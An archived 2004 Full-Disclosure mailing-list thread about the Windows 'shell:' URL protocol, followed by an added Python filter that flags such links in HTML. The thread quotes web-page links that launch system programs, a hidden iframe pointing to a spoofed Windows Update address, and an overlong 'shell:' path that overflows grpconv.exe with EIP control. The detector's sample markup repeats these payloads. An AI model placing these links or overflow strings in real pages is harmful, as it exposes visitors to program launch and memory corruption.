Re: [Full-Disclosure] shell:windows command question

From: Andreas Sandblad (sandbladacc.umu.se)
Date: Wed Jul 07 2004 - 14:25:12 CDT


This is dangerous. Based on the file extension of the shell protocol,
different applications may be launched. For example:
shell:.its will launch Internet Explorer
and shell:.mp3 will launch Winamp.

The trick is to find an application that will overflow when given a
very long parameter. A quick check showed that a buffer overflow occurred
within MSProgramGroup (WINDOWS\System32\grpconv.exe) after around 230
bytes with the following URL:
shell:[x*221].grp
EIP can be controlled, but exploitation is a bit tricky since the parameter is
stored as unicode.

Also Winamp contains a BO (no unicode here).

Tested environment:
Windows XP pro + FireFox 0.9.1

/Andreas Sandblad

On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:

> -----snip------
> <center><br><br><img src="nocigar.gif"></center>
> <center>
> <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
> src="http://windowsupdate.microsoft.com%2F.http-
> equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
> [customise as you see fit]
> <http://www.malware.com/stockpump.html>
> ------end----------
> The code above has interest to me.
> Even in Mozilla the commands below will work.
> <a href=shell:windows\\system32\\calc.exe>1</a>
> <a href=shell:windows\system32\calc.exe>2</a>
> <a href=shell:windows\system32\winver.exe>4</a>
> Just save them to an .html file and run it.
> The first one with the double quotes was from bugtraq:
> Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
> <http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
> The links below that will run calc as well as winver.
> It seems it calls windows as a virtual dir because c:\winxp is what I have.
> I have been playing around to see if cmd.exe will work with it but without
> luck.
> This is what is in the registry.
> HKEY_CLASSES_ROOT\Shell
> Look in the registry key above. You will find the shell object calls Windows
> Explorer with a particular set of arguments.
> %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
> So this is tied to explorer.exe. This is something involved with the
> underlying functions of windows
> and not IE so to speak because it works in Mozilla or from the run line.
> I'm trying to find out more about the shell: command because I can put a
> link on a site that seems to run anything
> in system32 dir. I'd like to see if you can pass parameters to it.
>
> Anyone give me more info on the shell:windows command?
> JP
>
>
> Joshua Perrymon
> Sr. Network Security Consultant
> PGP Fingerprint
> 51B8 01AC E58B 9BFE D57D 8EF6 C0B2 DECF EC20 6021
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
      _ _
    o' \,=./ `o
       (o o)
---ooO--(_)--Ooo---
 Andreas Sandblad
      Sweden
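
Added example, not part of the original message or of any tool named in this thread: a Python filter for a proxy or mail gateway that flags HTML attributes using the `shell:` scheme discussed above and reports the extension that selects the handler and the parameter length. The attribute list, the `LONG_PATH` threshold and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

URL_ATTRS = {"href", "src", "action", "data"}  # assumption: attributes worth checking
LONG_PATH = 200  # assumption: alert below the ~230 bytes mentioned in the message

def shell_target(value):
    """Return the part after 'shell:' if value uses that scheme, else None."""
    # Browsers ignore leading whitespace and tab/CR/LF embedded in a URL.
    cleaned = "".join(c for c in value.strip() if c not in "\t\r\n")
    if cleaned[:6].lower() != "shell:":
        return None
    return unquote(cleaned[6:])  # normalise %xx escapes before measuring

def extension(path):
    """Extension of the last path component; keeps names like '.mp3' intact."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return "." + name.rsplit(".", 1)[1].lower() if "." in name else ""

class ShellLinkFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            path = shell_target(value) if name in URL_ATTRS and value else None
            if path is not None:
                self.findings.append({
                    "line": self.getpos()[0], "tag": tag, "attr": name,
                    "ext": extension(path), "length": len(path),
                    "long": len(path) >= LONG_PATH})

def scan(html):
    finder = ShellLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: link forms quoted in the thread plus one benign link.
SAMPLE = """<a href="shell:windows\\snakeoil.txt">who goes there</a>
<a href=shell:windows\\system32\\calc.exe>2</a>
<a href="Shell:%s.grp">padded</a>
<a href="shell:.mp3">media</a>
<a href="http://example.com/shell:notascheme">benign</a>
""" % ("x" * 221)

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any hit is worth blocking or logging on its own, since ordinary web content has no reason to link to `shell:`; the `long` flag only ranks findings for triage.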
